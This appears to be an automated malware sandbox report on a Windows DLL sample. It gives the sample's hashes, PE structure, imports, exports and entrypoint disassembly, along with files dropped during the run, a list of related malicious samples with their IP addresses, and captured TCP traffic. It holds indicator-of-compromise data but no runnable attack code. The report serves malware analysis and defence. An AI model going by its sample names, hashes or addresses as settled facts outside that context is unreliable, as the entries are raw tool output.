MICROSOFT-CORP-MSN-AS-BLOCKUS	lnqNKSyWgz.exe	Get hash	malicious	Browse	13.72.107.36
	1c60a1e9_by_Libranalysis.rtf	Get hash	malicious	Browse	157.55.173.72
	DHL_988121.exe	Get hash	malicious	Browse	104.43.200.50
	DHL_988121.exe	Get hash	malicious	Browse	104.43.200.50
	A1qhcbngFV.exe	Get hash	malicious	Browse	20.47.146.252
	FuiZSHt8Hx.dll	Get hash	malicious	Browse	52.97.201.2
	609a460e94791.tiff.dll	Get hash	malicious	Browse	40.101.12.82
	iIoO9qC8yj.exe	Get hash	malicious	Browse	13.107.4.50
	qLi9sAxeSm.exe	Get hash	malicious	Browse	204.95.99.243
	f1a5fbd3e946e8db1c18bd1d30d0f8b41a873cbb76769.exe	Get hash	malicious	Browse	20.194.35.6
	tgix.exe	Get hash	malicious	Browse	137.117.64.85
	Protiviti.htm	Get hash	malicious	Browse	52.240.156.143
	hn80vhR3y1.exe	Get hash	malicious	Browse	13.69.222.243
	file.msg.exe	Get hash	malicious	Browse	104.47.56.161
	SCB_MT103_31951R2105050031_200505.PDF.exe	Get hash	malicious	Browse	157.55.136.23
	Windows_Update.exe	Get hash	malicious	Browse	20.52.178.148
	NcLDA3J4Kp.apk	Get hash	malicious	Browse	204.79.197.200
	LIau1wwvy5.exe	Get hash	malicious	Browse	20.43.33.61
	Update-KB1484-x86.exe	Get hash	malicious	Browse	104.47.37.36
	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.201.82
MICROSOFT-CORP-MSN-AS-BLOCKUS	lnqNKSyWgz.exe	Get hash	malicious	Browse	13.72.107.36
	1c60a1e9_by_Libranalysis.rtf	Get hash	malicious	Browse	157.55.173.72
	DHL_988121.exe	Get hash	malicious	Browse	104.43.200.50
	DHL_988121.exe	Get hash	malicious	Browse	104.43.200.50
	A1qhcbngFV.exe	Get hash	malicious	Browse	20.47.146.252
	FuiZSHt8Hx.dll	Get hash	malicious	Browse	52.97.201.2
	609a460e94791.tiff.dll	Get hash	malicious	Browse	40.101.12.82
	iIoO9qC8yj.exe	Get hash	malicious	Browse	13.107.4.50
	qLi9sAxeSm.exe	Get hash	malicious	Browse	204.95.99.243
	f1a5fbd3e946e8db1c18bd1d30d0f8b41a873cbb76769.exe	Get hash	malicious	Browse	20.194.35.6
	tgix.exe	Get hash	malicious	Browse	137.117.64.85
	Protiviti.htm	Get hash	malicious	Browse	52.240.156.143
	hn80vhR3y1.exe	Get hash	malicious	Browse	13.69.222.243
	file.msg.exe	Get hash	malicious	Browse	104.47.56.161
	SCB_MT103_31951R2105050031_200505.PDF.exe	Get hash	malicious	Browse	157.55.136.23
	Windows_Update.exe	Get hash	malicious	Browse	20.52.178.148
	NcLDA3J4Kp.apk	Get hash	malicious	Browse	204.79.197.200
	LIau1wwvy5.exe	Get hash	malicious	Browse	20.43.33.61
	Update-KB1484-x86.exe	Get hash	malicious	Browse	104.47.37.36
	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.201.82

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_002dad83\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12274
Entropy (8bit):	3.760387811626687
Encrypted:	false
SSDEEP:	192:+5WBNis0oXZHNXwRjed+E/u7sOS274ItWco:Z7iqXJNXwRjeh/u7sOX4ItWco
MD5:	65B1A8F8223E4AB018A95B43305BB1C8
SHA1:	48B24682C2E0631A963EB2BEF63ABD6F50ECF4C5
SHA-256:	5C437229DCC881F3B4F37B7BB9B772AADD7AD70D95C1E89E9A451E8C94726565
SHA-512:	B8368FBD391A5E5076D6ECE48C7D72A54678CE7804E745C7F734AD7C0D5F9C950C261ACBAD104FCA66DA226B637B0947043A395E90F4CEE78AD4C4F2FC3B4F1A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.5.2.9.1.2.7.3.5.2.0.9.7.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.5.2.9.1.2.7.9.9.5.8.4.6.1.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.d.6.1.5.5.3.-.f.7.a.7.-.4.3.9.c.-.9.3.8.2.-.1.4.2.2.2.5.7.3.5.c.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.0.1.e.5.c.d.-.5.2.f.7.-.4.a.c.1.-.9.e.d.f.-.3.7.4.b.4.c.7.2.e.6.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.0.-.0.0.0.1.-.0.0.1.b.-.8.f.e.4.-.2.3.d.0.1.e.4.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EB1.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed May 12 11:07:55 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	59358
Entropy (8bit):	1.9984891529039928
Encrypted:	false
SSDEEP:	192:fMcuApA1pdJOjc9qElfIpsp6Arg76Sn/kc/XOYAg04xG2OFY+GkxMHhrUlnaOuIq:zrA1pbOiPc7NN/r1xOY+GkxMHYaOuJp
MD5:	2DFACEB2A6B8E2DB10FA736DE4498EAC
SHA1:	59577B330853D4007FFD428C7A70100F6373F93E
SHA-256:	DF885B82793B6A37F202AD54154B6CDAC1F386C92701CF861E596B7AC12BAD52
SHA-512:	E48799E4955583C38E32D6BB69659B283872CA62DB27C401B8649FC3B6E5378CEBBEFDD65BF57CD53438DC72A10605644F1EB0FCE533D40726D15876ABB98A17
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........`...................U...........B......`.......GenuineIntelW...........T.......P......`.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9808.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8290
Entropy (8bit):	3.6921112436173114
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiRjB6dq6YTJ64LZLGgmfTkOS3A+pDB89ba6TsfSmkYm:RrlsNiVB6dq6Y964tagmfTkOS3qa64fs
MD5:	D2AE7D4FC19E3D3F00CB3BBA18716414
SHA1:	F27E57C80022F1AD378735B72957A6A4B05805E4
SHA-256:	A73833AD0DB5A85528DAD79B81C85DB2EC216A26CE6E5E54EE4EFAF76ACD3C37
SHA-512:	EF0D028A7827972648BC05A27D663712021B1B60ADA68BEE39322953D14959E472A79B7929F6DDFA7CCCD49BB5A064FCEB1EBF41BF1A4DA7FA042F844D27016D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A6B.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.450080143760217
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLtJgtWI96UWSC8BZ78fm8M4JCds9FK+q8/5CA4SrSMd:uITfLH9NSN/4JgwDWMd
MD5:	3A363033BCDA509CC11610F8EAE185F1
SHA1:	78454D6E43EC4DA98F46B02EF181673BCD929E6E
SHA-256:	E9E57C10B891757381366073C1037A28BD36DB3DAB60F99BEE3D2690BC0107EB
SHA-512:	2EEE18A1B383B6EFD63A077EB19D6962376420E14767329925B1C99B8FE4E415A2482D67B9DF1D39FE3FF0744AF5407F6AA97304F6FF5B1CADDB7B3170EB834A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="986178" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4BD5DCDD-B312-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7680840235180313
Encrypted:	false
SSDEEP:	192:rwZPZTw22TwzWTwttTwyifTwVJnzMTwLvd6vbBTwuYpB:rgxilQArz0
MD5:	F75591F98019D2A0608F3FB097EA2F15
SHA1:	4787CAEFE912FB167C6FEB9FE00EEC553BDEA5FC
SHA-256:	EB3FC9C41D9193ED4B8409124C88AF54D920E178F2CF2FBF466CA0CEA4C4A534
SHA-512:	8D9EF494C0885A2E3A489E923F8934839E91B90383DD56785E715EECC13F0170C3696DDFFF0200AEC840505CF2EF538A393BDD870573BBC676F7D75D9C781D80
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4BD5DCDF-B312-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27392
Entropy (8bit):	1.8524964337535361
Encrypted:	false
SSDEEP:	192:rHZUQs6Skhjl2pWAM0KIRKDDZBRIRKDDZNKD/A:r5d3L9cYVTCKD5CKDvKDo
MD5:	8B7FC14949EEB4934FD6671CDF794B2E
SHA1:	258C482B68B3B6141A58274D970E0B6207DB7ED9
SHA-256:	9EC0132700BAA61FE67AFAFF537B02FE5A31E856547FD0D7528964F4AC7EC3B6
SHA-512:	E29B09803C09DE623B3BB597AF7A4993B948AEE901871C459E6B2A5F024B15313688FBBAD3F181B042C39DBCDE1B9C3321DCDD67D6E696A60BA2854AC11F9C70
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.488012965147007
Encrypted:	false
SSDEEP:	3:oVXUXvcXSdH8JOGXnEXvcSeFUUCn:o9UXEXwqEXES
MD5:	174BE973E6B0C3BD797883F3212802DF
SHA1:	954D60C1360503B14A9E51AB3ACA4BDD2A5C0EB4
SHA-256:	C13A06C3F7825D7230CB567F756CDE4F8CADDE35A8FBED07F36E4688E0432EBA
SHA-512:	2E197883B6869C97B25DF329FFDB17A3AFAFEADF364613E0DB314B3CCFEC53E74658F36F66B605987E48B8BB53CD63B017242DC22228EC2121E56DA6A4434702
Malicious:	false
Preview:	[2021/05/12 13:07:54.927] Latest deploy version: ..[2021/05/12 13:07:54.974] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF7EA0309EEFF1F973.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39681
Entropy (8bit):	0.5798862163096153
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+9DhAjxIRKDDZ3IRKDDZjIRKDDZo:kBqoxKAuqR+9DhAjxCKDdCKDRCKD2
MD5:	4B91B3F5A88EEBB6F58712D6DAC44382
SHA1:	3E64372F0900AD52FE1259E702A1F0C2DE8004B0
SHA-256:	E2BA9974330571C2AD06972236C49D39DABF23514931341E6CCD45518C3F1AF4
SHA-512:	DFE874DEB1728240E12D778A374C521AD84BD7FA013D222665EF5E2032540DDB3333CEF9B722C1FEADC4E8077980F9F915517590A628CBCB0F5B4788CB9EBCFB
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA1436EB82669AF9C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4074938468026375
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loTwP9loTwP9lWTwkci:kBqoITwQTwuTwO
MD5:	A7BD0ABE7B8FC7B1D1EADEC39A42E343
SHA1:	83109B9245E2D070D04B32FA123C9D81EC10F66F
SHA-256:	51542B6CDC943EB6BE14D54417295C84A4FAF1FE953309D01F82ACAC05E59684
SHA-512:	B4B3E3AA2E56352062DDD43124FE1E1E8615C586546498A43346A6A8A27204601F55AA9405F90596767ECDFC2B2845AFE2A2F27CD04EE3953DFF71B1F4DBCE45
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.324538219307157
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nT5pUwoJSS.dll
File size:	478720
MD5:	6fdbd25f7a84da80ee9d8577122c3291
SHA1:	39a52cbc48be934cf953d4699e8a1ea5ff53a5bf
SHA256:	4bf6e9d4067cb905631ddf7452ac571c4ed9800c7eb8fc7e51b688e1154f52e3
SHA512:	935e43b18efb458f246523976f6b71655cf5c4465cddc86e5b91a9acc8e5d77f3bc3d2b0414d9e08114f286afd682cb9364193babaec4cd6b6ca871abf5b79de
SSDEEP:	12288:4Z31u8+a95+CA9lROexg8P7CbxXTTbWA:4Z31P9wr9lROog8W/
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C...".J.".J.".J...J.".J.pwJ.".J4mrJ.".J.pqJ.".J.pgJ.".J.p`J.".J...J.".J.".J.#.J.pkJ.".J.pvJ.".J.ppJ.".J.puJ.".JRich.".J.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1041953
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x608B79B0 [Fri Apr 30 03:29:52 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a2f0d616525ae6c643810961c7d4fdfe

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FC9209ACBD7h
call 00007FC9209B153Ch
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007FC9209ACAC1h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [01073618h+ecx*8]
je 00007FC9209ACBE5h
inc ecx
cmp ecx, 2Dh
jc 00007FC9209ACBC3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FC9209ACBE0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0107361Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FC9209AE4A6h
test eax, eax
jne 00007FC9209ACBD8h
mov eax, 01073780h
ret
add eax, 08h
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [0108B5ACh], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [0108B5ACh]
call 00007FC9209AE2A6h
pop ecx
test eax, eax
je 00007FC9209ACBE1h
push dword ptr [ebp+08h]
call eax
pop ecx
test eax, eax
je 00007FC9209ACBD7h
xor eax, eax
inc eax
pop ebp
ret
xor eax, eax
pop ebp
ret
mov edi, edi
push esi
push edi
xor esi, esi
mov edi, 0108B5B8h
cmp dword ptr [0107378Ch+esi*8], 01h
jne 00007FC9209ACBF0h
lea eax, dword ptr [00000088h+esi*8]

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2008 build 21022
[EXP] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x72630	0x6f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x71e64	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8d000	0x3bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8e000	0x1544	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49190	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x70c08	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x49000	0x15c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4732e	0x47400	False	0.745877878289	data	6.57408998047	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x49000	0x2969f	0x29800	False	0.65666768637	data	5.42368765721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x73000	0x1917c	0x1400	False	0.2435546875	data	3.63177828336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x8d000	0x3bc	0x400	False	0.4091796875	data	3.09285651514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8e000	0x2588	0x2600	False	0.456106085526	data	4.61056666922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x8d058	0x364	data	English	United States

Imports

DLL	Import
KERNEL32.dll	QueryPerformanceCounter, GetVolumeInformationW, GetSystemTime, GetModuleHandleW, GetVersionExW, OpenProcess, GetDateFormatW, FindResourceW, LockResource, GetLocalTime, HeapCreate, CreateFileW, HeapFree, HeapCompact, HeapAlloc, VirtualProtectEx, GetCurrentDirectoryW, SetConsoleCP, SetConsoleOutputCP, GetStringTypeW, GetStringTypeA, GetLocaleInfoA, LoadLibraryA, GetLastError, HeapReAlloc, RtlUnwind, GetCurrentThreadId, GetCommandLineA, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapDestroy, VirtualFree, VirtualAlloc, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, RaiseException, HeapSize, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount
ole32.dll	CoCreateInstance, CoUninitialize, OleInitialize, OleUninitialize, CoInitialize
WINSPOOL.DRV	EnumPrintersW, GetPrinterDataW, GetPrinterW, DocumentPropertiesW, OpenPrinterW, ClosePrinter

Exports

Name	Ordinal	Address
Eithernothing	1	0x103a020
Order	2	0x1039f40
Smileschool	3	0x1039b20

Version Infos

Description	Data
LegalCopyright	Notice sister Corporation. All rights reserved
InternalName	Slow
FileVersion	3.2.1.380
CompanyName	Notice sister Corporation
ProductName	Notice sister Soil read
Observe	38
ProductVersion	3.2.1
FileDescription	Notice sister Soil read Skinneed
OriginalFilename	Tail.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 13:07:56.524216890 CEST	49753	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.524513006 CEST	49754	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.652859926 CEST	80	49753	40.97.153.146	192.168.2.4
May 12, 2021 13:07:56.653002977 CEST	49753	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.653544903 CEST	80	49754	40.97.153.146	192.168.2.4
May 12, 2021 13:07:56.653630018 CEST	49754	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.654592991 CEST	49753	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.787769079 CEST	80	49753	40.97.153.146	192.168.2.4
May 12, 2021 13:07:56.788000107 CEST	49753	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.788275957 CEST	49753	80	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.807976961 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.917027950 CEST	80	49753	40.97.153.146	192.168.2.4
May 12, 2021 13:07:56.939476013 CEST	443	49755	40.97.153.146	192.168.2.4
May 12, 2021 13:07:56.939598083 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:56.956787109 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.088217020 CEST	443	49755	40.97.153.146	192.168.2.4
May 12, 2021 13:07:57.088253975 CEST	443	49755	40.97.153.146	192.168.2.4
May 12, 2021 13:07:57.088278055 CEST	443	49755	40.97.153.146	192.168.2.4
May 12, 2021 13:07:57.088347912 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.088407993 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.135567904 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.141473055 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.267406940 CEST	443	49755	40.97.153.146	192.168.2.4
May 12, 2021 13:07:57.267497063 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.273684978 CEST	443	49755	40.97.153.146	192.168.2.4
May 12, 2021 13:07:57.273825884 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.274255991 CEST	49755	443	192.168.2.4	40.97.153.146
May 12, 2021 13:07:57.340895891 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.341072083 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.389771938 CEST	443	49757	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.389811039 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.389878988 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.389921904 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.391278028 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.392539024 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.404428005 CEST	443	49755	40.97.153.146	192.168.2.4
May 12, 2021 13:07:57.440767050 CEST	443	49757	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.440804958 CEST	443	49757	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.440829992 CEST	443	49757	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.440850973 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.440888882 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.441837072 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.441859961 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.441878080 CEST	443	49756	52.97.233.66	192.168.2.4
May 12, 2021 13:07:57.441922903 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.441966057 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.456420898 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.456739902 CEST	49757	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.457509995 CEST	49756	443	192.168.2.4	52.97.233.66
May 12, 2021 13:07:57.507992983 CEST	443	49757	52.97.233.66	192.168.2.4
